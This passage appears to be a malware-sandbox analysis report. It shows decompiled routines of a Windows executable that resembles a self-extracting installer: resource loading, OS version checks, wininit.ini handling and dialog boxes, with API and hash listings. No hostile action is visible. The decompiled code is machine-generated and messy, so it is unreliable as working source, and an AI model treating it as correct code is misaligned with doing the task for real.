						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0039171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00396CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

APIs
  • Part of subcall function 0039171E: _vsnprintf.MSVCRT ref: 00391750
• LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003951CA,00000004,00000024,00392F71,?,00000002,00000000), ref: 003962CD
• LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003951CA,00000004,00000024,00392F71,?,00000002,00000000), ref: 003962D4
• FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003951CA,00000004,00000024,00392F71,?,00000002,00000000), ref: 0039631B
• FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00396345
• FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003951CA,00000004,00000024,00392F71,?,00000002,00000000), ref: 00396357
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Resource$Free$FindLoadLock_vsnprintf
• String ID: UPDFILE%lu
• API String ID: 2922116661-2329316264
• Opcode ID: 64a2806a25be408abfda5e31e81f3133546761cf59f65571c0791f92baba121f
• Instruction ID: d33862e1e913c70cb37331f035d2746e1a7e14c7098fb916b2d08f8487c66427
• Opcode Fuzzy Hash: 64a2806a25be408abfda5e31e81f3133546761cf59f65571c0791f92baba121f
• Instruction Fuzzy Hash: 5D21F875A01619ABDF139F649C869FF7B7CFB48710F01021AF902A3251DB369D018BE0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00393A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0039468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x398d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0039468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x398d4c, "<None>") == 0) {
							LocalFree( *0x398d4c);
							L9:
							 *0x399124 = 0;
							return 1;
						}
						_t9 = E00396517(_t19, 0x7d1, 0, E00393100, 0, 0);
						LocalFree( *0x398d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x399124 = 0x800704c7;
						L2:
						return 0;
					}
					E003944B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x398d4c);
					 *0x399124 = 0x80070714;
					goto L2;
				}
				E003944B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x399124 = E00396285();
				goto L2;
			}
                                                                                                                                                                                                    0x00393a87
                                                                                                                                                                                                    0x00393aa8
                                                                                                                                                                                                    0x00393ab3
                                                                                                                                                                                                    0x00393ab9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393ab9
                                                                                                                                                                                                    0x00393a78
                                                                                                                                                                                                    0x00393a82
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00392F64,?,00000002,00000000), ref: 00393A5D
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00393AB3
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                      • Part of subcall function 00396285: GetLastError.KERNEL32(00395BBC), ref: 00396285
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 00393AD0
                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 00393B13
                                                                                                                                                                                                      • Part of subcall function 00396517: FindResourceA.KERNEL32(00390000,000007D6,00000005), ref: 0039652A
                                                                                                                                                                                                      • Part of subcall function 00396517: LoadResource.KERNEL32(00390000,00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00396538
                                                                                                                                                                                                      • Part of subcall function 00396517: DialogBoxIndirectParamA.USER32(00390000,00000000,00000547,003919E0,00000000), ref: 00396557
                                                                                                                                                                                                      • Part of subcall function 00396517: FreeResource.KERNEL32(00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00396560
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00393100,00000000,00000000), ref: 00393AF4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                    • Opcode ID: 34369b1e372b95d1b7e1b6d3951e96f7f16fbfbb595b9db159ef42028acc7d78
                                                                                                                                                                                                    • Instruction ID: c9c5be61231250d55fd398db4fb71a4107956f5c958cd230411b7272a6571b85
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34369b1e372b95d1b7e1b6d3951e96f7f16fbfbb595b9db159ef42028acc7d78
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C11B9B1301201ABDF23AF369C09F1B79BDEBDA700F11452FB545DA6F1DA7B88018664
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
			E003924E0(void* __ebx) {
				signed int _v8;
				char _v268;                 // MAX_PATH-sized path buffer (0x104 bytes)
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				signed int _t25;            // file handle returned by _lopen (was undeclared in the decompiler output)
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x398004; // 0x74c05eb4, stack-cookie seed
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				// Build "<windir>\wininit.ini", flush it via WritePrivateProfileStringA,
				// then open it and seek to the end to obtain its size.
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0039658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2); // SEEK_END: offset == file size
						_lclose(_t25);
					}
				}
				return E00396CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26); // stack-cookie check epilogue
			}


                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00392506
                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0039252C
                                                                                                                                                                                                    • _lopen.KERNEL32 ref: 0039253B
                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0039254C
                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00392555
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                    • Opcode ID: 6f160ced5fda0d868d4e4a597ddef5afc2c9eea207993bf751bbbc3609dc5d42
                                                                                                                                                                                                    • Instruction ID: e50e1c0d069c2f7eedaa01566e19e800094c3f7e6e9845d38a980fa4a682acbd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f160ced5fda0d868d4e4a597ddef5afc2c9eea207993bf751bbbc3609dc5d42
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E30188326015186BCB22AB65DC0DEDFBB7CDB86750F010256FA49D3290DE758E45CAD1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E003936EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x398004; // 0x74c05eb4
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x398184 = 1;
						 *0x398180 = 1;
						L13:
						 *0x399a40 = _t119;
						L14:
						__eflags =  *0x398a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00392A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00392A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x398a38 & 0x00000001;
											if(( *0x398a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("nst0dum");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0039681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "nst0dum", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E003967C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                    										if(_t138 == 0x54c) {
                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138;
                                                                                                                                                                                                    										if(_t138 == 0) {
                                                                                                                                                                                                    											goto L66;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t135 = 0;
                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L37:
                                                                                                                                                                                                    									_t129 = _v432;
                                                                                                                                                                                                    									__eflags = _t129[0x7c];
                                                                                                                                                                                                    									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t133 =  &_v268;
                                                                                                                                                                                                    									_t104 = E003928E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                    									__eflags = _t104;
                                                                                                                                                                                                    									if(_t104 != 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t135 = _v428;
                                                                                                                                                                                                    									_t133 = 0x54d;
                                                                                                                                                                                                    									_t138 = 0x54d;
                                                                                                                                                                                                    									goto L40;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							if(_t91 > 0) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 != 0) {
                                                                                                                                                                                                    								__eflags = _t91;
                                                                                                                                                                                                    								if(_t91 != 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								__eflags = _t135;
                                                                                                                                                                                                    								if(_t135 == 0) {
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t138 = 0x54c;
                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                    							if(_t91 != 0) {
                                                                                                                                                                                                    								_t131 = _v424;
                                                                                                                                                                                                    								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                    								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                    							_t109 = _v424;
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                    							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                    							_t135 =  &(_t135[1]);
                                                                                                                                                                                                    							_v428 = _t135;
                                                                                                                                                                                                    							_v420 = _t135;
                                                                                                                                                                                                    							__eflags = _t135 - 2;
                                                                                                                                                                                                    						} while (_t135 < 2);
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t77 == 1;
                                                                                                                                                                                                    					if(_t77 == 1) {
                                                                                                                                                                                                    						 *0x399a40 = _t119;
                                                                                                                                                                                                    						 *0x398184 = 1;
                                                                                                                                                                                                    						 *0x398180 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - 3;
                                                                                                                                                                                                    						if(_t133 > 3) {
                                                                                                                                                                                                    							__eflags = _t133 - 5;
                                                                                                                                                                                                    							if(_t133 < 5) {
                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t113 = 3;
                                                                                                                                                                                                    							_t119 = _t113;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t119 = 1;
                                                                                                                                                                                                    						_t114 = 3;
                                                                                                                                                                                                    						 *0x399a40 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - _t114;
                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0x398184 = _t135;
                                                                                                                                                                                                    							 *0x398180 = _t135;
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                    						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t138 = 0x4ca;
                                                                                                                                                                                                    					goto L44;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t138 = 0x4b4;
                                                                                                                                                                                                    					L44:
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					L65:
                                                                                                                                                                                                    					_t133 = _t138;
                                                                                                                                                                                                    					E003944B9(0, _t138);
                                                                                                                                                                                                    					L66:
                                                                                                                                                                                                    					return E00396CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x003937ad
                                                                                                                                                                                                    0x003937ae
                                                                                                                                                                                                    0x003937b3
                                                                                                                                                                                                    0x003937b8
                                                                                                                                                                                                    0x003937b8
                                                                                                                                                                                                    0x003937bf
                                                                                                                                                                                                    0x003937bf
                                                                                                                                                                                                    0x003937c5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003937cb
                                                                                                                                                                                                    0x003937cd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003937d5
                                                                                                                                                                                                    0x003937db
                                                                                                                                                                                                    0x003937e8
                                                                                                                                                                                                    0x003937ea
                                                                                                                                                                                                    0x003937ea
                                                                                                                                                                                                    0x003937ea
                                                                                                                                                                                                    0x003937f0
                                                                                                                                                                                                    0x003937f6
                                                                                                                                                                                                    0x00393805
                                                                                                                                                                                                    0x00393817
                                                                                                                                                                                                    0x0039382b
                                                                                                                                                                                                    0x00393830
                                                                                                                                                                                                    0x00393836
                                                                                                                                                                                                    0x0039383b
                                                                                                                                                                                                    0x0039383d
                                                                                                                                                                                                    0x003938eb
                                                                                                                                                                                                    0x003938eb
                                                                                                                                                                                                    0x003938f2
                                                                                                                                                                                                    0x0039390c
                                                                                                                                                                                                    0x00393911
                                                                                                                                                                                                    0x00393911
                                                                                                                                                                                                    0x00393913
                                                                                                                                                                                                    0x0039394d
                                                                                                                                                                                                    0x0039394d
                                                                                                                                                                                                    0x0039394f
                                                                                                                                                                                                    0x003938a9
                                                                                                                                                                                                    0x003938a9
                                                                                                                                                                                                    0x003938b0
                                                                                                                                                                                                    0x003938b2
                                                                                                                                                                                                    0x003938b9
                                                                                                                                                                                                    0x003938bb
                                                                                                                                                                                                    0x003938c1
                                                                                                                                                                                                    0x00393975
                                                                                                                                                                                                    0x003938c7
                                                                                                                                                                                                    0x003938de
                                                                                                                                                                                                    0x003938e0
                                                                                                                                                                                                    0x003938e0
                                                                                                                                                                                                    0x0039397b
                                                                                                                                                                                                    0x0039397d
                                                                                                                                                                                                    0x003939a9
                                                                                                                                                                                                    0x0039397f
                                                                                                                                                                                                    0x00393982
                                                                                                                                                                                                    0x0039398b
                                                                                                                                                                                                    0x0039398d
                                                                                                                                                                                                    0x0039398f
                                                                                                                                                                                                    0x0039399f
                                                                                                                                                                                                    0x003939a1
                                                                                                                                                                                                    0x00393991
                                                                                                                                                                                                    0x00393991
                                                                                                                                                                                                    0x00393991
                                                                                                                                                                                                    0x0039398f
                                                                                                                                                                                                    0x003939af
                                                                                                                                                                                                    0x003939b6
                                                                                                                                                                                                    0x00393a0f
                                                                                                                                                                                                    0x00393a0f
                                                                                                                                                                                                    0x00393a11
                                                                                                                                                                                                    0x00393a13
                                                                                                                                                                                                    0x00393a19
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003939b8
                                                                                                                                                                                                    0x003939b8
                                                                                                                                                                                                    0x003939ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003939bc
                                                                                                                                                                                                    0x003939bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003939c3
                                                                                                                                                                                                    0x003939c9
                                                                                                                                                                                                    0x003939ce
                                                                                                                                                                                                    0x003939d0
                                                                                                                                                                                                    0x003939e3
                                                                                                                                                                                                    0x003939e5
                                                                                                                                                                                                    0x003939e6
                                                                                                                                                                                                    0x003939f1
                                                                                                                                                                                                    0x003939f7
                                                                                                                                                                                                    0x003939fa
                                                                                                                                                                                                    0x00393a01
                                                                                                                                                                                                    0x00393a04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393a06
                                                                                                                                                                                                    0x00393a09
                                                                                                                                                                                                    0x00393a09
                                                                                                                                                                                                    0x00393a0b
                                                                                                                                                                                                    0x00393a0b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393a09
                                                                                                                                                                                                    0x003939fc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003939fc
                                                                                                                                                                                                    0x003939d3
                                                                                                                                                                                                    0x003939d8
                                                                                                                                                                                                    0x003939da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003939dc
                                                                                                                                                                                                    0x003939b6
                                                                                                                                                                                                    0x00393955
                                                                                                                                                                                                    0x0039395b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393961
                                                                                                                                                                                                    0x00393963
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393969
                                                                                                                                                                                                    0x00393969
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393969
                                                                                                                                                                                                    0x00393915
                                                                                                                                                                                                    0x00393915
                                                                                                                                                                                                    0x0039391b
                                                                                                                                                                                                    0x0039391f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039392d
                                                                                                                                                                                                    0x00393933
                                                                                                                                                                                                    0x00393938

APIs
• GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00393723
• MessageBeep.USER32(00000000), ref: 003939C3
• MessageBoxA.USER32(00000000,00000000,nst0dum,00000030), ref: 003939F1
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: 3$nst0dum
• API String ID: 2519184315-140149190
• Opcode ID: 74d8c64b67f7f086a5edb55b0526da71d39946214e0db70ab4c1e0945c46d507
• Instruction ID: 96bb0bd1a98290593c8ea6a6602743079a45c5e9c8fac984c0e6e97f01f8025f
• Opcode Fuzzy Hash: 74d8c64b67f7f086a5edb55b0526da71d39946214e0db70ab4c1e0945c46d507
• Instruction Fuzzy Hash: 5191D2F1E052249BEF378B15CC81BEA77B5EB85304F1601AAD88ADB251DB718F81CB41
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 78%
E00396517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
	struct HRSRC__* _t6;
	int* _t5; // decompiler temporary, was used without a declaration
	void* _t21;
	struct HINSTANCE__* _t23;
	int _t24;

	_t23 =  *0x399a3c; // 0x390000, module base (HINSTANCE)
	// look up a dialog-template resource (RT_DIALOG == 5) by the name in __edx
	_t6 = FindResourceA(_t23, __edx, 5);
	if(_t6 == 0) {
		L6:
		// error path: show a message box (the MessageBoxA call listed above) and return the caller-supplied default
		E003944B9(0, 0x4fb, 0, 0, 0x10, 0);
		_t5 =  &_a16; // 0x392ee8
		_t24 =  *_t5;
	} else {
		_t21 = LoadResource(_t23, _t6);
		if(_t21 == 0) {
			goto L6;
		} else {
			// optional lParam for the dialog procedure
			if(_a12 != 0) {
				_push(_a12);
			} else {
				_push(0);
			}
			// run the dialog from the in-memory template; _a4 is the owner window, _a8 the dialog procedure
			_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
			FreeResource(_t21);
			if(_t24 == 0xffffffff) {
				goto L6;
			}
		}
	}
	return _t24;
}
